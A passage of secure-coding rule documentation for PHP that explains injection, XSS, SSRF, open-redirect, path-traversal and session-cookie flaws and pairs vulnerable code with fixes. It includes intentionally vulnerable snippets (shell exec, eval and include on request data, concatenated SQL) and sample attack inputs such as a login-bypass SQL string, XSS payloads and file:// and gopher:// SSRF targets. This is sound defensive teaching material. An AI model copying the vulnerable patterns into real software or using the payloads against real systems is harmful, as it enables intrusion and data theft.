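    $parts = parse_url($url);
    return $parts !== false
        && ($parts['scheme'] ?? '') === 'https'
        && ($parts['host'] ?? '') === 'trusted.example.com';
}

var_dump(isAllowedRedirect('https://trusted.example.com/account'));       // bool(true)
var_dump(isAllowedRedirect('https://trusted.example.com.evil.example/')); // bool(false)
```

Because parse_url extracts the full authority, a cybersquatted host such as trusted.example.com.evil.example fails the strict host comparison.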

Pitfalls

The trap of 'StartsWith' and equivalents

When validating untrusted URLs by checking if they start with a trusted scheme and authority pair scheme://authority, ensure that the validation string contains a path separator / as the last character.

If the validation string does not contain a terminating path separator, the Open Redirect vulnerability remains; only the exploitation technique changes.

Thus, a validation like startsWith("https://example.com"), or an equivalent regex such as ^https://example\.com.*, can be exploited with a URL like https://example.com.malicious.io. The practice of registering domains that maliciously resemble existing ones is widespread and is called cybersquatting.
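The pitfall can be demonstrated with PHP 8's str_starts_with, using the malicious URL from the text:

```php
<?php
// str_starts_with requires PHP >= 8.0.
$malicious = 'https://example.com.malicious.io/';

// Without a trailing '/', the cybersquatted domain passes the check:
var_dump(str_starts_with($malicious, 'https://example.com'));  // bool(true)

// With a terminating path separator, it is rejected:
var_dump(str_starts_with($malicious, 'https://example.com/')); // bool(false)
```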

Resources

Standards

phpsecurity:S5145

Why is this an issue?

Log injection occurs when an application fails to sanitize untrusted data used for logging.

An attacker can forge log content to prevent an organization from being able to trace back malicious activities.

What is the potential impact?

If an attacker can insert arbitrary data into a log file, the integrity of the chain of events being recorded can be compromised.
This frequently occurs because attackers can inject the log entry separator of the logger framework, commonly newlines, and thus insert artificial log entries.
Other attacks requiring only field pollution, such as cross-site scripting (XSS) or code injection (for example, Log4Shell), could also occur if the logged data is fed to other application components that interpret the injected data differently.

The focus of this rule is newline character replacement.

Log Forge

An attacker who is able to create independent log entries by injecting log entry separators can insert bogus data into a log file to conceal their malicious activities. This makes it harder for an incident response team to trace the origin of the breach, as the indicators of compromise (IoCs) lead to fake application events.

How to fix it in Core PHP

Code examples

The following code is vulnerable to log injection as it constructs log entries using untrusted data. An attacker can leverage this to manipulate the chain of events being recorded.

Noncompliant code example

$input = $_GET["input"];

error_log($input); // Noncompliant

Compliant solution

$input = $_GET["input"];

if(preg_match("/[^A-Za-z0-9-_]/", $input)){
  $safeinput = '[' . base64_encode($input) . ']';
}else{
  $safeinput = $input;
}
error_log($safeinput);

How does this work?

Data used for logging should be content-restricted and typed. This can be done by validating the data content or sanitizing it.
Validation and sanitization mainly revolve around preventing carriage return (CR) and line feed (LF) characters. However, further actions could be required based on the application context and the logged data usage.
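A minimal sanitization sketch along these lines replaces CR and LF so the untrusted value cannot start a new log entry; the input value below is illustrative:

```php
<?php
// In a real application this value would be attacker-controlled request data.
$input = "user123\r\nadmin logged in";

// Neutralize the log entry separators before logging.
$sanitized = str_replace(["\r", "\n"], '_', $input);

error_log($sanitized); // recorded as a single log entry
```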

Here, the compliant code example uses the preg_match function to check whether the input contains any unsafe characters. If it does, the base64_encode function is used to prevent any injection while preserving the original input content.

Resources

Standards

phpsecurity:S5167

This rule is deprecated; use S5122, S5146, S6287 instead.

Why is this an issue?

User-provided data, such as URL parameters, POST data payloads, or cookies, should always be considered untrusted and tainted. Applications constructing HTTP response headers based on tainted data could allow attackers to change security sensitive headers like Cross-Origin Resource Sharing headers.

Web application frameworks and servers might also allow attackers to inject newline characters into headers to craft malformed HTTP responses. In that case, the application would be vulnerable to a broader range of attacks, such as HTTP response splitting and smuggling. Most of the time, this type of attack is mitigated by default in modern web application frameworks, but there may be rare cases where older versions are still vulnerable.

As a best practice, applications that use user-provided data to construct the response header should always validate the data first. Validation should be based on a whitelist.

Noncompliant code example

$value = $_GET["value"];
header("X-Header: $value"); // Noncompliant

Compliant solution

$value = $_GET["value"];
if (ctype_alnum($value)) {
  header("X-Header: $value"); // Compliant
} else {
  // Error
}

Resources

phpsecurity:S5335

Why is this an issue?

Include injections occur in an application when the application retrieves data from a user or a third-party service and inserts it into an include expression without sanitizing it first.

If an application contains an include expression that is vulnerable to injections, it is exposed to attacks that target the underlying server.

What is the potential impact?

A user with malicious intent can craft requests that cause the include expression to leak valuable data or achieve remote code execution on the server hosting the website.

After creating the malicious request, the attacker can attack the servers affected by this vulnerability without relying on any prerequisites.

The impact depends on the access control measures taken on the target system OS. In the worst-case scenario, the process runs with root privileges, and therefore any OS commands or programs may be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Denial of service and data leaks

In this scenario, the attack aims to disrupt the organization’s activities and profit from data leaks.

An attacker could, for example:

  • download the internal server’s data, most likely to sell it
  • modify data, send malware
  • stop services or exhaust resources (with fork bombs for example)

This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker also manages to elevate their privileges to an administrative level and attacks other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised by a combination of OS injections and misconfiguration of:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it

Code examples

Noncompliant code example

$filename = $_GET["filename"];
include $filename; // Noncompliant

Compliant solution

$INCLUDE_ALLOW_LIST = [
    "home.php",
    "dashboard.php",
    "profile.php",
    "settings.php"
];

$filename = $_GET["filename"];
if (in_array($filename, $INCLUDE_ALLOW_LIST)) {
  include $filename;
}

How does this work?

Pre-Approved files

The cleanest way to avoid this defect is to validate the input before using it in an include-type expression.

Create a list of authorized and secure files that you want the application to be able to load with include-type expressions.
If a user input does not match an entry in this list, it should be rejected because it is considered unsafe.

Important note: The application must do validation on the server side, not in client-side front-ends.

Resources

phpsecurity:S2076

Why is this an issue?

OS command injections occur when applications build command lines from untrusted data before executing them with a system shell.
In that case, an attacker can tamper with the command line construction and force the execution of unexpected commands. This can lead to the compromise of the underlying operating system.

What is the potential impact?

An attacker exploiting an OS command injection vulnerability will be able to execute arbitrary commands on the underlying operating system.

The impact depends on the access control measures taken on the target system OS. In the worst-case scenario, the process runs with root privileges, and therefore any OS commands or programs may be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Denial of service and data leaks

In this scenario, the attack aims to disrupt the organization’s activities and profit from data leaks.

An attacker could, for example:

  • download the internal server’s data, most likely to sell it
  • modify data, send malware
  • stop services or exhaust resources (with fork bombs for example)

This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker also manages to elevate their privileges to an administrative level and attacks other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised by a combination of OS injections and misconfiguration of:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in Core PHP

Code examples

The following code is vulnerable to command injections because it is using untrusted inputs to set up a new process. Therefore an attacker can execute an arbitrary program that is installed on the system.

Noncompliant code example

$command = $_GET['cmd'];
exec($command, $output, $ret); // Noncompliant

echo ($ret == 0 ? "OK" : "KO");

Compliant solution

$allowedCommands = [["/bin/ping","-c","1","--"],["/usr/bin/host","--"]];

$cmdId = (int)$_GET["cmdId"];
if (!isset($allowedCommands[$cmdId])) {
    exit("KO");
}

$cmd = $allowedCommands[$cmdId];
$cmd[] = $_GET["host"];

$process = proc_open($cmd, [], $pipes); // array command requires PHP >= 7.4
$ret = proc_close($process);

echo ($ret == 0 ? "OK" : "KO");

How does this work?

Allowing users to execute operating system commands generally creates more problems than it solves.

Anything that can be done via operating system commands can usually be done via a language’s native SDK.
Therefore, our first suggestion is to avoid using OS commands in the first place.
However, if the application requires running OS commands with user-controlled data, here are some security suggestions.

Pre-Approved commands

If the application aims to execute only a small number of OS commands (for example, ls, pwd, and grep), the cleanest way to avoid this problem is to validate the input before using it in an OS command.

Create a list of authorized and secure commands that you want the application to be able to execute. Use absolute paths to avoid any ambiguity.
If a user input does not match an entry in this list, it should be rejected because it is considered unsafe.

Depending on the number of commands you want the application to support, the list can be either a regex string or any array type. If you use regexes, choose simple ones to avoid ReDoS attacks. For example, you can accept only a specific set of executables by using ^/bin/(ls|pwd|grep)$.

Important note: The application must do validation on the server side, not in client-side front-ends.

In the example compliant code, a static list of allowed commands is used. Users are only allowed to provide a command index that will be used to access this list. The command resulting from the list access can be considered trusted.

Neutralize special characters

If the application must execute complex commands that cannot be controlled through pre-approved lists, the cleanest approach is to use components that safely escape arguments, such as proc_open called with an array command.

This neutralizes common dangerous characters, such as:

  • &
  • |
  • ;
  • $
  • >
  • <
  • `
  • \
  • !

If user input is to be included in the arguments of a command, the application must ensure that dangerous options or argument delimiters are neutralized.
Argument delimiters include ', -, and spaces.

For example, the find command from UNIX supports the dangerous argument -exec.
In this case, option processing can be terminated with a string containing -- or with special options. For example, git supports --end-of-options since its version 2.24.

In the example compliant code, the proc_open function is used in place of the less safe exec alternative. Moreover, the command parameter of this function is set to an array. That way, the function will properly escape all the array elements and concatenate them to form the command line to execute.

Disable shell integration

In most cases, command execution libraries propose two ways to execute external programs: with or without shell integration.

When shell integration is allowed, an attacker with control over the command arguments can simply execute additional external programs using system shell features. For example, on Unix, command pipelining (|) or command and process substitution ($( ), <( ), etc.) can be used to break out of a command call.

Therefore, it is generally preferable to disable shell integration.

In the example compliant code, using the proc_open function with an array of arguments as a parameter disables shell integration.

Resources

Documentation

Standards

phpsecurity:S5334

Why is this an issue?

Code injections occur when applications allow the dynamic execution of code instructions from untrusted data.
An attacker can influence the behavior of the targeted application and modify it to get access to sensitive data.

What is the potential impact?

An attacker exploiting a dynamic code injection vulnerability will be able to execute arbitrary code in the context of the vulnerable application.

The impact depends on the access control measures taken on the target system OS. In the worst-case scenario, the process that executes the code runs with root privileges, and therefore any OS commands or programs may be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Denial of service and data leaks

In this scenario, the attack aims to disrupt the organization’s activities and profit from data leaks.

An attacker could, for example:

  • download the internal server’s data, most likely to sell it
  • modify data, send malware
  • stop services or exhaust resources (with fork bombs for example)

This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker also manages to elevate their privileges to an administrative level and attacks other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised by a combination of code injections and misconfiguration of:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in Core PHP

Code examples

The following code is vulnerable to arbitrary code execution because it builds and dynamically runs PHP code based on untrusted data.

Noncompliant code example

$operation = $_GET['operation'];
eval("product_${operation}();"); // Noncompliant

Compliant solution

$allowed = ["add", "remove", "update"];
$operationId = (int)$_GET["operationId"];
if (isset($allowed[$operationId])) {
    $operation = $allowed[$operationId];
    eval("product_{$operation}();");
}

How does this work?

Allowing users to execute code dynamically generally creates more problems than it solves.

Anything that can be done via dynamic code execution can usually be done via a language’s native SDK and static code.
Therefore, our suggestion is to avoid executing code dynamically.
If the application requires the execution of dynamic code, additional security measures must be taken.

Dynamic parameters

When the untrusted values are only expected to be values used in standard processing, it is generally possible to provide them as parameters of the dynamic code. In that case, care should be taken to pass only the name of the untrusted parameter to the dynamic code, rather than expanding its value into it. The dynamic code can then safely access the untrusted parameter’s content and perform the processing.

Allow list

When the untrusted parameters are expected to contain operators, function names or other reflection-related values, best practices would encourage using an allow list. This one would contain a list of accepted safe values that can be used as part of the dynamic code.

When receiving an untrusted parameter, the application would verify its value is contained in the configured allow list. If it is present, the parameter is accepted. Otherwise, it is rejected and an error is raised.

Another similar approach is using a binding between identifiers and accepted values. That way, users are only allowed to provide identifiers, where only valid ones can be converted to a safe value.

The compliant code example uses such a binding approach.
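A binding of identifiers to callables can also remove the need for eval entirely; the following is a minimal sketch in which the product_* functions and the identifier mapping are hypothetical:

```php
<?php
// Hypothetical operations; in a real application these would be the existing
// product_* functions the dynamic code was meant to reach.
function product_add()    { return 'added'; }
function product_remove() { return 'removed'; }

// Binding: identifiers users may supply, mapped to safe callables.
$operations = ['1' => 'product_add', '2' => 'product_remove'];

$operationId = '1'; // would come from the request in a real application
$result = null;
if (isset($operations[$operationId])) {
    $result = $operations[$operationId]();
}

echo $result, "\n"; // added
```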

Resources

Articles & blog posts

Standards

phpsecurity:S3649

Why is this an issue?

Database injections (such as SQL injections) occur in an application when the application retrieves data from a user or a third-party service and inserts it into a database query without sanitizing it first.

If an application contains a database query that is vulnerable to injections, it is exposed to attacks that target any database where that query is used.

A user with malicious intent carefully performs actions whose goal is to modify the existing query to change its logic to a malicious one.

After creating the malicious request, the attacker can attack the databases affected by this vulnerability without relying on any pre-requisites.

What is the potential impact?

In the context of a web application that is vulnerable to SQL injection:
After discovering the injection, attackers inject data into the vulnerable field to execute malicious commands in the affected databases.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Identity spoofing and data manipulation

A malicious database query enables privilege escalation or direct data leakage from one or more databases. This threat is the most widespread impact.

Data deletion and denial of service

The malicious query makes it possible for the attacker to delete data in the affected databases.
This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Chaining DB injections with other vulnerabilities

Attackers who exploit SQL injections rely on other vulnerabilities to maximize their profits.
Most of the time, organizations overlook some defense in depth measures because they assume attackers cannot reach certain points in the infrastructure. This misbehavior can lead to multiple attacks with great impact:

  • When secrets are stored unencrypted in databases: Secrets can be exfiltrated and lead to compromise of other components.
  • If server-side OS and/or database permissions are misconfigured, injection can lead to remote code execution (RCE).

How to fix it in Core PHP

Code examples

The following code is an example of an overly simple authentication function. It is vulnerable to SQL injection because user-controlled data is inserted directly into a query string: The application assumes that incoming data always has a specific range of characters, and ignores that some characters may change the query logic to a malicious one.

In this particular case, the query can be exploited with the following string:

foo' OR 1=1 --

By adapting and inserting this template string into one of the fields (user or pass), an attacker would be able to log in as any user within the scoped user table.

Noncompliant code example

class AuthenticationHandler {

    public mysqli $conn;

    function authenticate() {
        $user = $_POST['user'];
        $pass = $_POST['pass'];
        $authenticated = false;

        $query = "SELECT * FROM users WHERE user = '" . $user . "' AND pass = '" . $pass . "'";

        $stmt = $this->conn->query($query); // Noncompliant

        if ($stmt->num_rows == 1) {
          $authenticated = true;
        }

        return $authenticated;
    }
}

Compliant solution

class AuthenticationHandler {

    public mysqli $conn;

    function authenticate() {
        $user = $_POST['user'];
        $pass = $_POST['pass'];
        $authenticated = false;

        $query = "SELECT * FROM users WHERE user = ? AND pass = ?";

        $stmt = $this->conn->prepare($query);
        $stmt->bind_param("ss", $user, $pass);
        $stmt->execute();

        $stmt->store_result();

        if ( $stmt->num_rows == 1) {
          $authenticated = true;
        }

        return $authenticated;
    }
}

How does this work?

Use prepared statements

As a rule of thumb, the best approach to protect against injections is to systematically ensure that untrusted data cannot break out of an interpreted context.

For database queries, prepared statements are a natural mechanism to achieve this due to their internal workings.
Here is an example with the following query string:

SELECT * FROM users WHERE user = ? AND pass = ?

Note: Placeholders may take different forms depending on the library used. In the above example, the question mark symbol '?' is used as a placeholder.
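As an illustration of a different placeholder style, PDO supports named placeholders; this sketch uses an in-memory SQLite database and made-up table contents purely for demonstration:

```php
<?php
// In-memory SQLite database, for demonstration only.
$pdo = new PDO('sqlite::memory:');
$pdo->exec('CREATE TABLE users (user TEXT, pass TEXT)');
$pdo->exec("INSERT INTO users VALUES ('alice', 's3cret')");

// Named placeholders: :user and :pass are compiled as parameters.
$stmt = $pdo->prepare('SELECT * FROM users WHERE user = :user AND pass = :pass');

// The classic injection string stays a plain literal, not query logic.
$stmt->execute([':user' => "alice' OR 1=1 --", ':pass' => 'x']);
$row = $stmt->fetch();

var_dump($row === false); // the injection attempt matches no row
```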

When a prepared statement is used by an application, the database server compiles the query logic even before the application passes the literals corresponding to the placeholders to the database.
Some libraries expose a dedicated prepare function that explicitly does so, while others perform the compilation transparently.

The compiled code that contains the query logic also includes the placeholders: they serve as parameters.

After compilation, the query logic is frozen and cannot be changed.
So when the application passes the literals that replace the placeholders, they are not considered application logic by the database.

Consequently, the database server prevents the dynamic literals of a prepared statement from affecting the underlying query, and thus sanitizes them.

On the other hand, the application does not automatically sanitize third-party data (for example, user-controlled data) inserted directly into a query. An attacker who controls this third-party data can cause the database to execute malicious code.

Resources

Articles & blog posts

Standards

phpsecurity:S5131

This vulnerability makes it possible to temporarily execute JavaScript code in the context of the application, granting access to the session of the victim. This is possible because user-provided data, such as URL parameters, are copied into the HTML body of the HTTP response that is sent back to the user.

Why is this an issue?

Reflected cross-site scripting (XSS) occurs in a web application when the application retrieves data like parameters or headers from an incoming HTTP request and inserts it into its HTTP response without first sanitizing it. The most common cause is the insertion of GET parameters.

When well-intentioned users open a link to a page that is vulnerable to reflected XSS, they are exposed to attacks that target their own browser.

A user with malicious intent carefully crafts the link beforehand.

After creating this link, the attacker uses phishing techniques to get the target users to click on it.

What is the potential impact?

A well-intentioned user opens a malicious link that injects data into the web application. This data can be text, but it can also be arbitrary code that can be interpreted by the target user’s browser, such as HTML, CSS, or JavaScript.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Vandalism on the front-end website

The malicious link defaces the target web application from the perspective of the user who is the victim. This may result in loss of integrity and theft of the benevolent user’s data.

Identity spoofing

The forged link injects malicious code into the web application. The code enables identity spoofing through cookie theft.

Record user activity

The forged link injects malicious code into the web application. To leak confidential information, attackers can inject code that records keyboard activity (keylogger) and even requests access to other devices, such as the camera or microphone.

Chaining XSS with other vulnerabilities

In many cases, bug hunters and attackers chain cross-site scripting vulnerabilities with other vulnerabilities to maximize their impact.
For example, an XSS can be used as the first step to exploit more dangerous vulnerabilities or features that require higher privileges, such as a code injection vulnerability in the admin control panel of a web application.

How to fix it in Core PHP

Code examples

The following code is vulnerable to cross-site scripting because it returns an HTML response that contains user input.

User input embedded in HTML code should be HTML-encoded to prevent the injection of additional code. PHP provides the built-in function htmlspecialchars to do this.

Noncompliant code example

echo '<h1>' . $input . '</h1>';

Compliant solution

echo '<h1>' . htmlspecialchars($input) . '</h1>';

If you do not intend to send HTML code to clients, the vulnerability can be fixed by specifying the type of data returned in the response with the content-type header.

For example, setting the content-type to text/plain using the built-in header function makes it safe to reflect user input, since browsers will not try to parse and execute the response.

Noncompliant code example

echo $input;

Compliant solution

header('Content-Type: text/plain');
echo $input;

How does this work?

Encode data according to the HTML context

The best approach to protect against XSS is to systematically encode data that is written to HTML documents. The goal is to leave the data intact from the end user’s point of view but make it uninterpretable by web browsers.

XSS exploitation techniques vary depending on the HTML context where malicious input is injected. For each HTML context, there is a specific encoding to prevent JavaScript code from being interpreted. The following table summarizes the encoding to apply for each HTML context.

Context | Code example | Exploit example | Encoding

In between tags

<!doctype html>
<div>
  { data }
</div>
<!doctype html>
<div>
  <script>
    alert(1)
  </script>
</div>

HTML entity encoding: replace the following characters with HTML-safe sequences.

  • & → &amp;
  • < → &lt;
  • > → &gt;
  • " → &quot;
  • ' → &#x27;

In an attribute surrounded with single or double quotes

<!doctype html>
<div tag="{ data }">
  ...
</div>
<!doctype html>
<div tag=""
     onmouseover="alert(1)">
  ...
</div>

HTML entity encoding: replace the following characters with HTML-safe sequences.

  • & → &amp;
  • < → &lt;
  • > → &gt;
  • " → &quot;
  • ' → &#x27;

In an unquoted attribute

<!doctype html>
<div tag={ data }>
  ...
</div>
<!doctype html>
<div tag=foo
     onmouseover=alert(1)>
  ...
</div>

Dangerous context: HTML output encoding will not prevent XSS fully.

In a URL attribute

<!doctype html>
<a href="{ data }">
  ...
</a>
<!doctype html>
<a href="javascript:alert(1)">
  ...
</a>

Validate the URL by parsing the data. Make sure relative URLs start with a / and that absolute URLs use https as a scheme.

In a script block

<!doctype html>
<script>
  { data }
</script>
<!doctype html>
<script>
  alert(1)
</script>

Dangerous context: HTML output encoding will not prevent XSS fully. To pass values to a JavaScript context, the recommended way is to use a data attribute:

<!doctype html>
<script data="{ data }">
  ...
</script>
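As an illustration (in Python rather than PHP), the standard library's html.escape applies exactly the five substitutions listed in the contexts above:

```python
import html

payload = '<script>alert(1)</script>'
encoded = html.escape(payload, quote=True)

# The five dangerous characters become HTML-safe entities, so the
# browser renders the payload as text instead of executing it.
print(encoded)  # &lt;script&gt;alert(1)&lt;/script&gt;
```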

Pitfalls

Content-types

Be aware that content types other than text/html can also allow JavaScript code to execute in a browser and are therefore prone to cross-site scripting vulnerabilities.
The following content types are known to be affected:

  • application/mathml+xml
  • application/rdf+xml
  • application/vnd.wap.xhtml+xml
  • application/xhtml+xml
  • application/xml
  • image/svg+xml
  • multipart/x-mixed-replace
  • text/html
  • text/rdf
  • text/xml
  • text/xsl

Single quoted variables in attributes

Before PHP 8.1, htmlspecialchars does not encode single quotes by default, so if $input is untrusted, JavaScript code can be injected.

Make sure to set the option ENT_QUOTES to encode single quotes.

Noncompliant code example
echo "<img src='" . htmlspecialchars($input) . "'>";
Compliant solution
echo "<img src='" . htmlspecialchars($input, ENT_QUOTES) . "'>";
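Python's html.escape has an analogous switch; as an illustrative sketch, quote=False mirrors htmlspecialchars without ENT_QUOTES, while the default quote=True mirrors ENT_QUOTES:

```python
import html

payload = "x' onmouseover='alert(1)"

# quote=False mimics htmlspecialchars without ENT_QUOTES:
# single quotes pass through and can break out of the attribute.
unsafe = html.escape(payload, quote=False)
assert "'" in unsafe

# quote=True (the default) also encodes both quote characters,
# like htmlspecialchars with ENT_QUOTES.
safe = html.escape(payload, quote=True)
assert "'" not in safe
```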

Headers and output

If any part of the HTTP body is sent before header is called, PHP can no longer modify the response headers and the call has no effect.

To fix this issue, send the headers before any output.

Noncompliant code example
echo 'No more headers at this point';
header('Content-Type: text/plain');
echo $input;
Compliant solution
header('Content-Type: text/plain');
echo $input;

Going the extra mile

Content Security Policy (CSP) Header

With a defense-in-depth security approach, the CSP response header can be added to instruct client browsers to block loading data that does not meet the application’s security requirements. If configured correctly, this can prevent any attempt to exploit XSS in the application.

Resources

Documentation

Articles & blog posts

Conference presentations

Standards

phpsecurity:S5144

Why is this an issue?

Server-Side Request Forgery (SSRF) occurs when attackers can coerce a server to perform arbitrary requests on their behalf.

An SSRF vulnerability can either be basic or blind, depending on whether the server’s fetched data is directly returned in the web application’s response.
Even when the application does not return the response of the coerced request (blind SSRF), exploitation is still possible, so blind SSRF must be treated in the same way as basic SSRF.

What is the potential impact?

SSRF usually results in unauthorized actions or data disclosure in the vulnerable application or on another system it can reach. Depending on what is reachable, remote command execution may be achieved, although it often requires chaining with further exploits.

Information disclosure is SSRF’s core outcome. Depending on the extracted data, an attacker can perform a variety of different actions that can range from low to critical severity.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Local file read to host takeover

An attacker manipulates an application into performing a local request for a sensitive file, such as ~/.ssh/id_rsa, by using the File URI scheme file://.
Once in possession of the SSH keys, the attacker establishes a remote connection to the system hosting the web application.

Internal Network Reconnaissance

An attacker enumerates internal accessible ports from the affected server or others to which the server can communicate by iterating over the port field in the URL http://127.0.0.1:{port}.
Taking advantage of other supported URL schemas (dependent on the affected system), for example, gopher://127.0.0.1:3306, an attacker would be able to connect to a database service and perform queries on it.

How to fix it in Core PHP

Code examples

The following code is vulnerable to SSRF as it opens a URL defined by untrusted data.

Noncompliant code example

$host = $_GET['host'];
$url = "https://$host/.well-known/openid-configuration";

$ch = curl_init($url); // Noncompliant
curl_exec($ch);

Compliant solution

$allowedHosts = ["trusted1" => "trusted1.example.com", "trusted2" => "trusted2.example.com"];

if (!array_key_exists($_GET['host'], $allowedHosts)) {
    exit('Unknown host');
}
$host = $allowedHosts[$_GET['host']];
$url = "https://$host/.well-known/openid-configuration";

$ch = curl_init($url);
curl_exec($ch);

How does this work?

The application should avoid opening URLs that are constructed with untrusted data.

When such a feature is strictly necessary, SSRF can be mitigated by applying an allow-list of trustable schemes and domains.

The compliant code example uses such an approach.
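The same allow-list lookup, sketched in Python for illustration (keys and host names are placeholders):

```python
# Keys and host names are placeholders for a real configuration.
ALLOWED_HOSTS = {
    "trusted1": "trusted1.example.com",
    "trusted2": "trusted2.example.com",
}

def build_url(host_key: str) -> str:
    # Reject anything that is not an explicit allow-list key, so the
    # attacker never controls the authority part of the URL.
    if host_key not in ALLOWED_HOSTS:
        raise ValueError("unknown host")
    return f"https://{ALLOWED_HOSTS[host_key]}/.well-known/openid-configuration"
```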

Pitfalls

The trap of 'StartsWith' and equivalents

When validating untrusted URLs by checking if they start with a trusted scheme and authority pair scheme://authority, ensure that the validation string contains a path separator / as the last character.

If the validation string does not contain a terminating path separator, the SSRF vulnerability remains; only the exploitation technique changes.

Thus, a validation like startsWith("https://example.com"), or an equivalent regex such as ^https://example\.com.*, can be bypassed with the URL https://example.commit.malicious.io.
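This trap is easy to reproduce; a small Python sketch:

```python
malicious = "https://example.commit.malicious.io"

# Missing trailing slash: the malicious authority passes the check.
assert malicious.startswith("https://example.com")

# A terminating path separator closes the hole.
assert not malicious.startswith("https://example.com/")
```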

Resources

Standards

phpsecurity:S2083

Why is this an issue?

Path injections occur when an application uses untrusted data to construct a file path and access this file without validating its path first.

A user with malicious intent would inject specially crafted values, such as ../, to change the initial intended path. The resulting path would resolve somewhere in the filesystem where the user should not normally have access to.

What is the potential impact?

A web application is vulnerable to path injection and an attacker is able to exploit it.

The files that can be affected are limited by the permission of the process that runs the application. Worst case scenario: the process runs with root privileges on Linux, and therefore any file can be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Override or delete arbitrary files

The injected path component tampers with the location of a file the application is supposed to delete or write into. The vulnerability is exploited to remove or corrupt files that are critical for the application or for the system to work properly.

It could result in data being lost or the application being unavailable.

Read arbitrary files

The injected path component tampers with the location of a file the application is supposed to read and output. The vulnerability is exploited to leak the content of arbitrary files from the file system, including sensitive files like SSH private keys.

How to fix it in Core PHP

Code examples

The following code is vulnerable to path injection as it creates a path using untrusted data without validation.

An attacker can exploit the vulnerability in this code to read arbitrary files.

Noncompliant code example

$fileName = $_GET["filename"];

file_get_contents($fileName); // Noncompliant

Compliant solution

$fileName = $_GET["filename"];
$targetDirectory = "/path/to/target/directory/";

$path = realpath($targetDirectory . $fileName);

if ($path !== false && str_starts_with($path, $targetDirectory)) {
    file_get_contents($path);
}

How does this work?

Canonical path validation

If it is impossible to use secure-by-design APIs that do this automatically, the universal way to prevent path injection is to validate paths constructed from untrusted data:

  1. Ensure the target directory path ends with a forward slash to prevent partial path traversal, for example, /base/dirmalicious starts with /base/dir but does not start with /base/dir/.
  2. Resolve the canonical path of the file using a method like realpath. This resolves relative path components such as ../ and removes any ambiguity regarding the file’s location.
  3. Check that the canonical path is within the directory where the file should be located.

Important Note: The order of this process pattern is important. The code must follow this order exactly to be secure by design:

  1. data = transform(user_input);
  2. data = normalize(data);
  3. data = sanitize(data);
  4. use(data);

As pointed out in this SonarSource talk, failure to follow this exact order leads to security vulnerabilities.
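A minimal Python sketch of the three validation steps, assuming a hypothetical base directory; posixpath.normpath stands in for a realpath-style call (a production implementation should also resolve symlinks and check existence):

```python
import posixpath

BASE_DIR = "/var/app/files/"  # hypothetical; note the trailing slash (step 1)

def is_safe(file_name: str) -> bool:
    # Step 2: normalize ../ components to obtain the canonical path.
    canonical = posixpath.normpath(BASE_DIR + file_name)
    # Step 3: the canonical path must stay inside the base directory.
    return canonical.startswith(BASE_DIR)
```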

Resources

Standards

phpsecurity:S6287

Why is this an issue?

Session Cookie Injection occurs when a web application assigns session cookies to users using untrusted data.

Session cookies are used by web applications to identify users. Thus, controlling them enables control over users’ identities within the application.

The injection might occur via a GET parameter, with the payload, for example https://example.com?cookie=injectedcookie, delivered using phishing techniques.

What is the potential impact?

A well-intentioned user opens a malicious link that injects a session cookie in their web browser. This forces the user into unknowingly browsing a session that isn’t theirs.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Sensitive data disclosure

A victim introduces sensitive data within the attacker’s application session, which the attacker can later retrieve. The implications vary with the type of data disclosed: a leak of strictly confidential user data has a different impact than a leak of organizational data.

Vulnerability chaining

An attacker not only manipulates a user into browsing an application using a session cookie of their control but also successfully detects and exploits a self-XSS on the target application.
The victim browses the vulnerable page using the attacker’s session and is affected by the XSS, which can then be used for a wide range of attacks including credential stealing using mirrored login pages.

How to fix it in Core PHP

Code examples

The following code is vulnerable to Session Cookie Injection as it assigns a session cookie using untrusted data.

Noncompliant code example

function checkCookie()
{
    if (!isset($_COOKIE['PHPSESSID'])) {
        $value = $_GET['cookie'];
        setcookie('PHPSESSID', $value); // Noncompliant
    }

    header('Location: /welcome.php');
}

Compliant solution

function checkCookie()
{
    if (!isset($_COOKIE['PHPSESSID'])) {
        header('Location: /getcookie.php');
        exit;
    }

    header('Location: /welcome.php');
}

How does this work?

Untrusted data, such as GET or POST request content, should always be considered tainted. Therefore, an application should not blindly assign the value of a session cookie to untrusted data.

Session cookies should be generated using the built-in APIs of secure libraries that include session management instead of developing homemade tools.
Often, these existing solutions benefit from quality maintenance in terms of features, security, or hardening, and it is usually better to use these solutions than to develop your own.
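As an illustrative Python sketch of the same principle, the session identifier comes from a cryptographically secure random generator and is never derived from request data:

```python
import secrets

def new_session_id() -> str:
    # 32 bytes from the OS CSPRNG, URL-safe base64 encoded;
    # the value is never taken from anything the client sent.
    return secrets.token_urlsafe(32)
```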

Resources

Standards

phpsecurity:S6350

Constructing arguments of system commands from user input is security-sensitive. It has led to serious vulnerabilities in the past.

Arguments of system commands are processed by the executed program. The arguments are usually used to configure and influence the behavior of the programs. Control over a single argument might be enough for an attacker to trigger dangerous features like executing arbitrary commands or writing files into specific directories.

Ask Yourself Whether

  • Malicious arguments can result in undesired behavior in the executed command.
  • Passing user input to a system command is not necessary.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

